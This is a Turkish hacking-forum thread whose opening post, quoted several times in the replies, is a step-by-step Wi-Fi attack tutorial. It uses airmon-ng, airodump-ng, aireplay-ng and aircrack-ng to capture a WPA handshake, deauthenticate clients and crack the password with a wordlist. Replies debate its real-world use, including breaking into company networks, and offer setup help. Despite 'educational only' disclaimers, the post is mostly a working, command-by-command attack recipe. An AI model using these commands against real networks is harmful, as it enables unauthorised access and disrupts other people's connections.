Kablosuz Ağ Saldırıları ▷ deAuth, Handshake Yakalama ve Parola Kırma @py_pow

  • Konuyu başlatan Konuyu başlatan py_pow
  • Başlangıç tarihi Başlangıç tarihi

py_pow

Üye
Katılım
3 Ara 2022
Mesajlar
134
Çözümler
2
Tepkime puanı
80
Kablosuz Ağ Saldırıları ▷ deAuth, Handshake Yakalama ve Parola Kırma
Medium'da okumak için tıklayın

Merhaba, bu yazımda Wi-Fi Hacking (Kablosuz Ağ Saldırıları) konusunu ele alacağım. Bu yazıda yapılacak saldırı metodolojisi şunlar;
  • deAuth saldırısı yaparak bir cihazı ağdan düşürmek,
  • Yakalanan handshake de bulunan hashli Wi-Fi parolasını wordlist ile kırmak.

Wi-Fi Hacking için bu yazıda kullandığım araçlar:
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng

⚠ Bu içerik tamamen eğitim amaçlıdır.
Kablosuz adaptör kurulumu hakkında bilgi almak için:
Kablosuz Adaptör Kurulumu



Adaptörü Monitör Moduna Alma

Kablosuz adaptör varsayılan olarak "Managed" modundadır. Wi-Fi Hacking için adaptörü "Monitör (izleme)" moduna almak gerekir.

Kod:
iwconfig

Bu komut, ağ kartınızın:
- Arayüz ismini (ör. wlan0,eth0),
- Modunu,
- Bağlı olduğu ağın ESSID'sini (isim bilgisi) gösterir.
1*v9uOEOvevNOSfm_ADIscFA.png

Monitör moduna geçiş için:
Kod:
airmon-ng check

Bu komut, ağı kullanan işlemleri listeler (örneğin, NetworkManager ve wpa_supplicant). Bu işlemleri sonlandırmak için:
Kod:
airmon-ng check kill

Monitör moduna almak için:
Kod:
airmon-ng start wlan0

Son olarak, monitör moda geçtiğini kontrol edelim;
Kod:
iwconfig


Dinleme ve Handshake Yakalama

Monitör moduna geçtiğimize göre, ağları tarayabiliriz:
Kod:
airodump-ng wlan0

Bu komutla etrafınızdaki ağ noktalarını ve şu bilgileri görebilirsiniz:
- BSSID (modemin MAC adresi),
- CHANNEL ( WiFi'nin bulunduğu kanal numarası),
- ESSID (Wi-Fi ismi).

Hedef ağı belirledikten sonra aşağıdaki komutla dinlemeye alıyoruz
Kod:
airodump-ng -c <Kanal> --bssid <ModemMACAdresi> -w filename wlan0

Bu komut ile , saldircagamiz ağın handshake paketlerini yakalıyoruz.



deAuth Saldırısı

Ağdaki kullanıcılara deAuth saldırısı yaparak onları ağdan düşürebilir ve yeniden bağlanmaya çalıştıklarında handshake paketlerini yakalayabilirsiniz:
Kod:
aireplay-ng --deauth 10 -a <ModemMACAdresi> -c <CihazMACAdresi> wlan0

- `--deauth` parametresi, kaç paket gönderileceğini belirtir.
- `-a` parametresi, hedef router'ın MAC adresini girer.
- `-c` parametresi, hedef cihazın MAC adresini belirtir.
1*IVsBZIAni94HpQRhHYElCw.png


1*ei1rJ0eTzw70531zx48XUQ.png

Yukarıda ki görselde handshake yakalandığı belirtiliyor.
Parola Kırma

Yakalanan handshake paketlerini kullanarak parola kırma işlemi için:
Kod:
aircrack-ng -b <ModemMACAdresi> -w <WordlistDosyası>.txt handshake.cap
1*EEHamtguHbvlvlsZREfduQ.png



Monitör Modundan Çıkış

Adaptörü tekrar Managed moduna almak için:
Kod:
airmon-ng stop wlan0
systemctl start NetworkManager

⚠ UYARI: Bu bilgiyi kötüye kullanmayınız!
Bu yazıda, deAuth saldırısı, handshake yakalama ve parola kırma işlemlerini elimden geldiğince anlattım. Umarım faydalı olur. Yakında bu saldırı türü için otomatik bir araç içeriği de paylaşacağım. İyi çalışmalar!
 
Basit ve belkil gerçek hackte işe yaramayan detay bi konu ama anlatış şekli çok iyi ve pratik kazanmanızı ve gaza gelmenizi sağlar 8/10
 
Öncelikle düşünceni paylaştığın için teşekkürler lakin "basit ve gerçek hayatta kullanılmayan bir teknik değil " demek absurd bilmiyorum bu tür konularda ne kadar bilgilisiniz en azından bilginiz yok ise arastirsaniz iyi olur. Profildeki mesajlar kısmının çokta bir anlamı yok zira. Bu teknik gerçek hayatta çalışıyor. Tekrardan teşekkürler.
 
Yok çalışıyor ama ya WiFi kırarsın küçük iş yada büyük şirketin networküne girmek için kullanırsın büyük iş
 
Hocam biraz sacma gelebilir ama bilmedigimden soruyom bu islemleri yapabilmek için herhangi bir ağa bağlanmamiz gerekirmi
 
Hayır. Sadece linux /windows işletim sistemi (önerim linux)ve wifi adaptörü.
 
Kablosuz Ağ Saldırıları ▷ deAuth, Handshake Yakalama ve Parola Kırma
Medium'da okumak için tıklayın

Merhaba, bu yazımda Wi-Fi Hacking (Kablosuz Ağ Saldırıları) konusunu ele alacağım. Bu yazıda yapılacak saldırı metodolojisi şunlar;
  • deAuth saldırısı yaparak bir cihazı ağdan düşürmek,
  • Yakalanan handshake de bulunan hashli Wi-Fi parolasını wordlist ile kırmak.

Wi-Fi Hacking için bu yazıda kullandığım araçlar:
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng

⚠ Bu içerik tamamen eğitim amaçlıdır.
Kablosuz adaptör kurulumu hakkında bilgi almak için:
Kablosuz Adaptör Kurulumu



Adaptörü Monitör Moduna Alma

Kablosuz adaptör varsayılan olarak "Managed" modundadır. Wi-Fi Hacking için adaptörü "Monitör (izleme)" moduna almak gerekir.

Kod:
iwconfig

Bu komut, ağ kartınızın:
- Arayüz ismini (ör. wlan0,eth0),
- Modunu,
- Bağlı olduğu ağın ESSID'sini (isim bilgisi) gösterir.
1*v9uOEOvevNOSfm_ADIscFA.png

Monitör moduna geçiş için:
Kod:
airmon-ng check

Bu komut, ağı kullanan işlemleri listeler (örneğin, NetworkManager ve wpa_supplicant). Bu işlemleri sonlandırmak için:
Kod:
airmon-ng check kill

Monitör moduna almak için:
Kod:
airmon-ng start wlan0

Son olarak, monitör moda geçtiğini kontrol edelim;
Kod:
iwconfig


Dinleme ve Handshake Yakalama

Monitör moduna geçtiğimize göre, ağları tarayabiliriz:
Kod:
airodump-ng wlan0

Bu komutla etrafınızdaki ağ noktalarını ve şu bilgileri görebilirsiniz:
- BSSID (modemin MAC adresi),
- CHANNEL ( WiFi'nin bulunduğu kanal numarası),
- ESSID (Wi-Fi ismi).

Hedef ağı belirledikten sonra aşağıdaki komutla dinlemeye alıyoruz
Kod:
airodump-ng -c <Kanal> --bssid <ModemMACAdresi> -w filename wlan0

Bu komut ile , saldircagamiz ağın handshake paketlerini yakalıyoruz.



deAuth Saldırısı

Ağdaki kullanıcılara deAuth saldırısı yaparak onları ağdan düşürebilir ve yeniden bağlanmaya çalıştıklarında handshake paketlerini yakalayabilirsiniz:
Kod:
aireplay-ng --deauth 10 -a <ModemMACAdresi> -c <CihazMACAdresi> wlan0

- `--deauth` parametresi, kaç paket gönderileceğini belirtir.
- `-a` parametresi, hedef router'ın MAC adresini girer.
- `-c` parametresi, hedef cihazın MAC adresini belirtir.
1*IVsBZIAni94HpQRhHYElCw.png


1*ei1rJ0eTzw70531zx48XUQ.png

Yukarıda ki görselde handshake yakalandığı belirtiliyor.
Parola Kırma

Yakalanan handshake paketlerini kullanarak parola kırma işlemi için:
Kod:
aircrack-ng -b <ModemMACAdresi> -w <WordlistDosyası>.txt handshake.cap
1*EEHamtguHbvlvlsZREfduQ.png



Monitör Modundan Çıkış

Adaptörü tekrar Managed moduna almak için:
Kod:
airmon-ng stop wlan0
systemctl start NetworkManager

⚠ UYARI: Bu bilgiyi kötüye kullanmayınız!
Bu yazıda, deAuth saldırısı, handshake yakalama ve parola kırma işlemlerini elimden geldiğince anlattım. Umarım faydalı olur. Yakında bu saldırı türü için otomatik bir araç içeriği de paylaşacağım. İyi çalışmalar!
Ellerine sağlık, brute force ile kırılan bir wifi kalmamıştır diye düşünüyorum. Kaldıysa da admin paneline 40 yılda 1 girenlerdir. Benim tavsiyem 2 ayda bir wifi şifresinin değiştirilmesi ve ciddi şifreler koyulması. Yoksa ben de biliyorum "fenerbahce1907" koymayı :/ . Bazı kişiler garip karşılıyor fakat vaziyet bu. Bu arada sonunda parrot kullanan birisine rastladım :D İyi çalışmalar.
 
Kablosuz Ağ Saldırıları ▷ deAuth, Handshake Yakalama ve Parola Kırma
Medium'da okumak için tıklayın

Merhaba, bu yazımda Wi-Fi Hacking (Kablosuz Ağ Saldırıları) konusunu ele alacağım. Bu yazıda yapılacak saldırı metodolojisi şunlar;
  • deAuth saldırısı yaparak bir cihazı ağdan düşürmek,
  • Yakalanan handshake de bulunan hashli Wi-Fi parolasını wordlist ile kırmak.

Wi-Fi Hacking için bu yazıda kullandığım araçlar:
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng

⚠ Bu içerik tamamen eğitim amaçlıdır.
Kablosuz adaptör kurulumu hakkında bilgi almak için:
Kablosuz Adaptör Kurulumu



Adaptörü Monitör Moduna Alma

Kablosuz adaptör varsayılan olarak "Managed" modundadır. Wi-Fi Hacking için adaptörü "Monitör (izleme)" moduna almak gerekir.

Kod:
iwconfig

Bu komut, ağ kartınızın:
- Arayüz ismini (ör. wlan0,eth0),
- Modunu,
- Bağlı olduğu ağın ESSID'sini (isim bilgisi) gösterir.
1*v9uOEOvevNOSfm_ADIscFA.png

Monitör moduna geçiş için:
Kod:
airmon-ng check

Bu komut, ağı kullanan işlemleri listeler (örneğin, NetworkManager ve wpa_supplicant). Bu işlemleri sonlandırmak için:
Kod:
airmon-ng check kill

Monitör moduna almak için:
Kod:
airmon-ng start wlan0

Son olarak, monitör moda geçtiğini kontrol edelim;
Kod:
iwconfig


Dinleme ve Handshake Yakalama

Monitör moduna geçtiğimize göre, ağları tarayabiliriz:
Kod:
airodump-ng wlan0

Bu komutla etrafınızdaki ağ noktalarını ve şu bilgileri görebilirsiniz:
- BSSID (modemin MAC adresi),
- CHANNEL ( WiFi'nin bulunduğu kanal numarası),
- ESSID (Wi-Fi ismi).

Hedef ağı belirledikten sonra aşağıdaki komutla dinlemeye alıyoruz
Kod:
airodump-ng -c <Kanal> --bssid <ModemMACAdresi> -w filename wlan0

Bu komut ile , saldircagamiz ağın handshake paketlerini yakalıyoruz.



deAuth Saldırısı

Ağdaki kullanıcılara deAuth saldırısı yaparak onları ağdan düşürebilir ve yeniden bağlanmaya çalıştıklarında handshake paketlerini yakalayabilirsiniz:
Kod:
aireplay-ng --deauth 10 -a <ModemMACAdresi> -c <CihazMACAdresi> wlan0

- `--deauth` parametresi, kaç paket gönderileceğini belirtir.
- `-a` parametresi, hedef router'ın MAC adresini girer.
- `-c` parametresi, hedef cihazın MAC adresini belirtir.
1*IVsBZIAni94HpQRhHYElCw.png


1*ei1rJ0eTzw70531zx48XUQ.png

Yukarıda ki görselde handshake yakalandığı belirtiliyor.
Parola Kırma

Yakalanan handshake paketlerini kullanarak parola kırma işlemi için:
Kod:
aircrack-ng -b <ModemMACAdresi> -w <WordlistDosyası>.txt handshake.cap
1*EEHamtguHbvlvlsZREfduQ.png



Monitör Modundan Çıkış

Adaptörü tekrar Managed moduna almak için:
Kod:
airmon-ng stop wlan0
systemctl start NetworkManager

⚠ UYARI: Bu bilgiyi kötüye kullanmayınız!
Bu yazıda, deAuth saldırısı, handshake yakalama ve parola kırma işlemlerini elimden geldiğince anlattım. Umarım faydalı olur. Yakında bu saldırı türü için otomatik bir araç içeriği de paylaşacağım. İyi çalışmalar!
Güzel sevdiğim saldırı türleri...
Seninde emeğine sağlık dostum.
 
Kablosuz Ağ Saldırıları ▷ deAuth, Handshake Yakalama ve Parola Kırma
Medium'da okumak için tıklayın

Merhaba, bu yazımda Wi-Fi Hacking (Kablosuz Ağ Saldırıları) konusunu ele alacağım. Bu yazıda yapılacak saldırı metodolojisi şunlar;
  • deAuth saldırısı yaparak bir cihazı ağdan düşürmek,
  • Yakalanan handshake de bulunan hashli Wi-Fi parolasını wordlist ile kırmak.

Wi-Fi Hacking için bu yazıda kullandığım araçlar:
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng

⚠ Bu içerik tamamen eğitim amaçlıdır.
Kablosuz adaptör kurulumu hakkında bilgi almak için:
Kablosuz Adaptör Kurulumu



Adaptörü Monitör Moduna Alma

Kablosuz adaptör varsayılan olarak "Managed" modundadır. Wi-Fi Hacking için adaptörü "Monitör (izleme)" moduna almak gerekir.

Kod:
iwconfig

Bu komut, ağ kartınızın:
- Arayüz ismini (ör. wlan0,eth0),
- Modunu,
- Bağlı olduğu ağın ESSID'sini (isim bilgisi) gösterir.
1*v9uOEOvevNOSfm_ADIscFA.png

Monitör moduna geçiş için:
Kod:
airmon-ng check

Bu komut, ağı kullanan işlemleri listeler (örneğin, NetworkManager ve wpa_supplicant). Bu işlemleri sonlandırmak için:
Kod:
airmon-ng check kill

Monitör moduna almak için:
Kod:
airmon-ng start wlan0

Son olarak, monitör moda geçtiğini kontrol edelim;
Kod:
iwconfig


Dinleme ve Handshake Yakalama

Monitör moduna geçtiğimize göre, ağları tarayabiliriz:
Kod:
airodump-ng wlan0

Bu komutla etrafınızdaki ağ noktalarını ve şu bilgileri görebilirsiniz:
- BSSID (modemin MAC adresi),
- CHANNEL ( WiFi'nin bulunduğu kanal numarası),
- ESSID (Wi-Fi ismi).

Hedef ağı belirledikten sonra aşağıdaki komutla dinlemeye alıyoruz
Kod:
airodump-ng -c <Kanal> --bssid <ModemMACAdresi> -w filename wlan0

Bu komut ile , saldircagamiz ağın handshake paketlerini yakalıyoruz.



deAuth Saldırısı

Ağdaki kullanıcılara deAuth saldırısı yaparak onları ağdan düşürebilir ve yeniden bağlanmaya çalıştıklarında handshake paketlerini yakalayabilirsiniz:
Kod:
aireplay-ng --deauth 10 -a <ModemMACAdresi> -c <CihazMACAdresi> wlan0

- `--deauth` parametresi, kaç paket gönderileceğini belirtir.
- `-a` parametresi, hedef router'ın MAC adresini girer.
- `-c` parametresi, hedef cihazın MAC adresini belirtir.
1*IVsBZIAni94HpQRhHYElCw.png


1*ei1rJ0eTzw70531zx48XUQ.png

Yukarıda ki görselde handshake yakalandığı belirtiliyor.
Parola Kırma

Yakalanan handshake paketlerini kullanarak parola kırma işlemi için:
Kod:
aircrack-ng -b <ModemMACAdresi> -w <WordlistDosyası>.txt handshake.cap
1*EEHamtguHbvlvlsZREfduQ.png



Monitör Modundan Çıkış

Adaptörü tekrar Managed moduna almak için:
Kod:
airmon-ng stop wlan0
systemctl start NetworkManager

⚠ UYARI: Bu bilgiyi kötüye kullanmayınız!
Bu yazıda, deAuth saldırısı, handshake yakalama ve parola kırma işlemlerini elimden geldiğince anlattım. Umarım faydalı olur. Yakında bu saldırı türü için otomatik bir araç içeriği de paylaşacağım. İyi çalışmalar!
Elinize emeginize saglık
 
Kablosuz Ağ Saldırıları ▷ deAuth, Handshake Yakalama ve Parola Kırma
Medium'da okumak için tıklayın

Merhaba, bu yazımda Wi-Fi Hacking (Kablosuz Ağ Saldırıları) konusunu ele alacağım. Bu yazıda yapılacak saldırı metodolojisi şunlar;
  • deAuth saldırısı yaparak bir cihazı ağdan düşürmek,
  • Yakalanan handshake de bulunan hashli Wi-Fi parolasını wordlist ile kırmak.

Wi-Fi Hacking için bu yazıda kullandığım araçlar:
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng

⚠ Bu içerik tamamen eğitim amaçlıdır.
Kablosuz adaptör kurulumu hakkında bilgi almak için:
Kablosuz Adaptör Kurulumu



Adaptörü Monitör Moduna Alma

Kablosuz adaptör varsayılan olarak "Managed" modundadır. Wi-Fi Hacking için adaptörü "Monitör (izleme)" moduna almak gerekir.

Kod:
iwconfig

Bu komut, ağ kartınızın:
- Arayüz ismini (ör. wlan0,eth0),
- Modunu,
- Bağlı olduğu ağın ESSID'sini (isim bilgisi) gösterir.
1*v9uOEOvevNOSfm_ADIscFA.png

Monitör moduna geçiş için:
Kod:
airmon-ng check

Bu komut, ağı kullanan işlemleri listeler (örneğin, NetworkManager ve wpa_supplicant). Bu işlemleri sonlandırmak için:
Kod:
airmon-ng check kill

Monitör moduna almak için:
Kod:
airmon-ng start wlan0

Son olarak, monitör moda geçtiğini kontrol edelim;
Kod:
iwconfig


Dinleme ve Handshake Yakalama

Monitör moduna geçtiğimize göre, ağları tarayabiliriz:
Kod:
airodump-ng wlan0

Bu komutla etrafınızdaki ağ noktalarını ve şu bilgileri görebilirsiniz:
- BSSID (modemin MAC adresi),
- CHANNEL ( WiFi'nin bulunduğu kanal numarası),
- ESSID (Wi-Fi ismi).

Hedef ağı belirledikten sonra aşağıdaki komutla dinlemeye alıyoruz
Kod:
airodump-ng -c <Kanal> --bssid <ModemMACAdresi> -w filename wlan0

Bu komut ile , saldircagamiz ağın handshake paketlerini yakalıyoruz.



deAuth Saldırısı

Ağdaki kullanıcılara deAuth saldırısı yaparak onları ağdan düşürebilir ve yeniden bağlanmaya çalıştıklarında handshake paketlerini yakalayabilirsiniz:
Kod:
aireplay-ng --deauth 10 -a <ModemMACAdresi> -c <CihazMACAdresi> wlan0

- `--deauth` parametresi, kaç paket gönderileceğini belirtir.
- `-a` parametresi, hedef router'ın MAC adresini girer.
- `-c` parametresi, hedef cihazın MAC adresini belirtir.
1*IVsBZIAni94HpQRhHYElCw.png


1*ei1rJ0eTzw70531zx48XUQ.png

Yukarıda ki görselde handshake yakalandığı belirtiliyor.
Parola Kırma

Yakalanan handshake paketlerini kullanarak parola kırma işlemi için:
Kod:
aircrack-ng -b <ModemMACAdresi> -w <WordlistDosyası>.txt handshake.cap
1*EEHamtguHbvlvlsZREfduQ.png



Monitör Modundan Çıkış

Adaptörü tekrar Managed moduna almak için:
Kod:
airmon-ng stop wlan0
systemctl start NetworkManager

⚠ UYARI: Bu bilgiyi kötüye kullanmayınız!
Bu yazıda, deAuth saldırısı, handshake yakalama ve parola kırma işlemlerini elimden geldiğince anlattım. Umarım faydalı olur. Yakında bu saldırı türü için otomatik bir araç içeriği de paylaşacağım. İyi çalışmalar!
wlan0 çıkmıyor https://hizliresim.com/1t4p2ij
 
Merhabalar,
Ağ adaptörünüzün kurulumunu yaptınız mı?
 
Geri
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.